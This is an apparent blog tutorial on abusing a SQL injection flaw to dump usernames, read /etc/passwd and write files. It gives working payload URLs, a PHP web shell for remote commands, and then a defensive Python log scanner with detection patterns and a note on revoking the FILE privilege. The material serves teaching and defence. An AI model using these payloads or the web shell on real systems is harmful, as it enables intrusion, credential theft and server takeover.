File Write via SQL
Hi folks,
you probably know SQL injections. SQL injections provide a lot of fun concerning database manipulation. But they are also a great way to read and write files.
Consider the website example.com. In our example, the application provides a version parameter that is susceptible to SQL injection. As a consequence, an attacker can do database voodoo like
http://example.com/index.php?version=1.0' UNION ALL SELECT NULL,NULL,username FROM users--
This should return a list of user names that are stored in the table users. If you have no idea how this actually works, I recommend reading some SQL injection literature given in Further Reading.
Reading Files
The following listing is slightly edited to give us the content of the file /etc/passwd. This is done via LOAD_FILE. Note that this only works with files readable by the database user.
http://example.com/index.php?version=1.0' UNION ALL SELECT NULL,NULL,LOAD_FILE("/etc/passwd") FROM users--
Writing Files
After reading files, let's go ahead and write them. The listing has changed once more to write to an outfile via the SELECT ... INTO OUTFILE statement.
http://example.com/index.php?version=1.0' UNION ALL SELECT NULL,NULL,"<?php echo 'hello world'; ?>" INTO OUTFILE "/var/www/vhosts/example.com/foobar.php"--
The fun part is that our PHP statement is written into /var/www/vhosts/example.com/foobar.php. Writing files is a big win for every adversary. A possible next step is to write <? system($_GET['cmd']); ?> into a file readable by the web server. In case of success, the attacker has a nice remote shell by using http://example.com/foobar.php?cmd=ls -l.
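From the defender's side, the requests shown above leave a recognizable trace in the web server's access log. The following Python example is added here and is not part of the original post: it decodes each query parameter and flags UNION SELECT, LOAD_FILE and INTO OUTFILE/DUMPFILE. The log lines are constructed, and the rule names, search.php and the q parameter are assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit, unquote_plus

# One rule per statement used in the post's URLs (rule names are assumptions).
RULES = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "file_read": re.compile(r"\bload_file\s*\("),
    "file_write": re.compile(r"\binto\s+(outfile|dumpfile)\b"),
}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] '
    '"GET /index.php?version=1.0 HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:00:07 +0000] '
    '"GET /index.php?version=1.0%27%20UNION%20ALL%20SELECT%20NULL,NULL,'
    'LOAD_FILE(%22/etc/passwd%22)%20FROM%20users-- HTTP/1.1" 200 2048',
    '203.0.113.9 - - [01/Jan/2024:10:00:31 +0000] '
    '"GET /index.php?version=1.0%2527%2520union%2520all%2520select%2520NULL,NULL,'
    '%2522x%2522%2520into%2520outfile%2520%2522/var/www/vhosts/example.com/'
    'foobar.php%2522-- HTTP/1.1" 200 0',
    '198.51.100.2 - - [01/Jan/2024:10:01:02 +0000] '
    '"GET /search.php?q=outfile+format HTTP/1.1" 200 900',
]

def normalize(value, max_rounds=3):
    """Undo leftover percent-encoding, lowercase, collapse whitespace."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return re.sub(r"\s+", " ", value.lower())

def scan_line(line):
    """Return sorted (parameter, rule) hits for one access-log line."""
    match = REQUEST.search(line)
    if not match:
        return []
    hits = set()
    # parse_qsl decodes once; normalize() handles double encoding.
    for name, value in parse_qsl(urlsplit(match.group(1)).query):
        text = normalize(value)
        hits.update((name, rule) for rule, rx in RULES.items() if rx.search(text))
    return sorted(hits)

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(scan_line(line), line.split('"')[1][:60])
```

A hit is a lead to investigate, not proof of compromise. LOAD_FILE and INTO OUTFILE only succeed when the database account holds MySQL's FILE privilege and secure_file_priv permits the path, so revoking that privilege from the web application's account removes both primitives.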